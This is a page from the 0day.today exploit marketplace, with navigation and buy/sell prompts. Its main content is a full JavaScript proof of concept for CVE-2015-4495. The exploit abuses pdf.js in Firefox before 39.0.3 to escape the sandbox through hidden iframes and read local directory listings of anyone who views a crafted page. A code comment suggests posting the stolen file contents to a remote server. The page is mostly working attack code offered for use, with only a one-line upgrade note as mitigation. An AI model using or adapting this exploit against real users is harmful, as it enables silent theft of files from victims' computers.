0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Firefox 39.03 - pdf.js Same Origin Policy Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
/*
# Exploit Title: Firefox < 39.03 pdf.js same origin policy exploit
# Date: 13-08-2014
# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
# Software Link: http://ftp.mozilla.org/pub/firefox/releases/39.0/linux-x86_64/en-US/firefox-39.0.tar.bz2
# Version: 39.0 [Should work version before 39.0.3]
# Tested on: Linux (Ubuntu 14.04.3 LTS) [Should probably work in OSX]
# CVE : 2015-4495
# POC code taken from https://github.com/vincd/CVE-2015-4495
1. Description
This exploit allow attacker to read and copy information on victim's computer, once they view the web site crafted with this exploit.
2. Proof of Concept
Create a index.html and copy and paste the following html into it:
<!DOCTYPE html>
<html>
<head>
<title>CVE-2015-4495</title>
</head>
<body>
<h1>Test</h1>
<script type="text/javascript" src="./exploit.js" charset="utf-8"></script>
</body>
</html>
Run the index.html (Make sure the main.js is in the same directory) and we should be able to see the directory listing.
3. Solution
Upgrade to the latest firefox ( > 39.0.3)
*/
var start_timeout=2000;
var sandbox_context_i=null;
var DIR_CACHE={};
var FILE_CACHE={};
var hidden=true;
var my_win_id=null;
function start() {
i=document.getElementById("i");
i2=document.getElementById("i2");
if(typeof sandboxContext!=='undefined') {
clearInterval(intVal);
var os = navigator.platform;
if (os.search("Mac") > -1 || os.search("Linux") > -1) {
// NOTE: Replace the following root directory into any directory of your
// choice. Can make it an array and loop through it.
get_dir("/", function(data) {
// nothing to do here...
});
}
}
}
function parse_directory_listing(dir, data) {
var pattern = '<tbody><tr><td><a class=';
var start = 0;
var listing = 'Listing:\n';
while ((start = data.search(pattern)) >= 0) {
var d = data.substring(start + pattern.length + 1),
end = d.search('>'),
f = d.substring(0, end);
f = f.split(' ');
var t = f[0].substring(0, f[0].length-1);
var n = f[1].substring(6, f[1].length-1);
listing += ' [' + t + '] ' + dir + '/' + n + '\n';
data = d.substring(end);
}
// NOTE: Replace with some other useful stuff. Eg: Read the file and do a post
// request to send all the content to a remote server.
alert(listing);
}
function get_dir(dir,callback,internal) {
get(dir,function() {
data=get_data(this);
var dir=location.href.toString();
dir=dir.replace(/^file\:\/\//i,'');
dir=decodeURIComponent(dir);
parse_directory_listing(dir, data);
}, 500, "%target_dir%", dir);
}
function xml2string(obj) {
return new XMLSerializer().serializeToString(obj);
}
function _(s,template,value) {
s=s.toString().split(/^\s*function\s+\(\s*\)\s*\{/)[1];
s=s.substring(0,s.length-1);
if(template&&value)
s=s.replace(template,value);
s+=parse_directory_listing;
s+=__proto;
s+=xml2string;
s+=get_data;
s=s.replace(/\s\/\/.*\n/g,"");
s=s+";undefined";
return s;
}
function __proto(obj) {
return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}
function get_data(obj) {
data=null;
try {
data=obj.document.documentElement.innerHTML;
if (data.indexOf('dirListing') < 0) {
throw new Error();
}
} catch(e) {
if (this.document instanceof XMLDocument) {
data=xml2string(this.document);
} else {
try {
if (this.document.body.firstChild.nodeName.toUpperCase()=='PRE') {
data=this.document.body.firstChild.textContent;
} else {
throw new Error();
}
} catch(e) {
try {
if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') >- 1 ) {
return null;
} else {
throw new Error();
}
} catch(e) {
;
}
}
}
}
return data;
}
function get(path,callback,timeout,template,value){
callback = _(callback);
if(template && value) callback = callback.replace(template,value);
proto_prefix="file://";
var invisible_code="";
js_call1='javascript:'+invisible_code+_(function(){
try {
open("%url%","_self");
} catch(e) {
history.back();
} undefined;
}, "%url%", proto_prefix+path);
js_call2='javascript:' + invisible_code + ';try{updateHidden();}catch(e){};' + callback + ';undefined';
sandboxContext(_(function() {
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
l = p.__lookupSetter__.call(i2.contentWindow,'location');
l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
}));
setTimeout((function() {
sandboxContext(_(function() {
p = __proto(i.contentDocument.styleSheets[0].ownerNode);
l = p.__lookupSetter__.call(i2.contentWindow,'location');
l.call(i2.contentWindow,window.wrappedJSObject.js_call2);
}));
}), timeout);
}
function get_sandbox_context() {
if(my_win_id==null) {
for(var i=0;i<20;i++) {
try {
if(window[i].location.toString().indexOf("view-source:")!=-1) {
my_win_id=i;;break;
}
} catch(e) {}
}
};
if(my_win_id==null) return;
clearInterval(sandbox_context_i);
object.data='view-source:' + blobURL;
window[my_win_id].location='data:application/x-moz-playpreview-pdfjs;,';
object.data='data:text/html,<html/>';
window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe onload="' + _(function() {
window.wrappedJSObject.sandboxContext = (function(cmd) {
with(importFunction.constructor('return this')()) {
return eval(cmd);
}
});
}) + '"/>');
}
function setup_plugin() {
var i = document.createElement("iframe");
i.id = "i";
i.width = 1;
i.height = 1;
i.src = "data:application/xml,<" + "?xml version=\"1.0\"?><e><e1></e1></e>";
i.frameBorder = 0;
document.documentElement.appendChild(i);
i.onload=function() {
if(this.contentDocument.styleSheets.length>0) {
var i2 = document.createElement("iframe");
i2.id="i2";
i2.src="data:application/pdf,";
i2.frameBorder=0;
if(!hidden) {
i2.width="100%";
i2.height="700px";
} else {
i2.width=1;
i2.height=1;
}
document.documentElement.appendChild(i2);
pdfBlob=new Blob([''], { type:'application/pdf' });
blobURL = URL.createObjectURL(pdfBlob);
object = document.createElement('object');
object.data='data:application/pdf,';
if(hidden) {
object.style.display='none';
object.width=1;
object.height=1;
}
object.onload = (function() {
sandbox_context_i = setInterval(get_sandbox_context,200);
object.onload=null;
object.data='view-source:' + location.href;return;
});
document.documentElement.appendChild(object);
} else {
this.contentWindow.location.reload();
}
}
}
setTimeout(function() {
setup_plugin();
intVal = setInterval(start, 150);
}, start_timeout);
# 0day.today [2024-11-14] #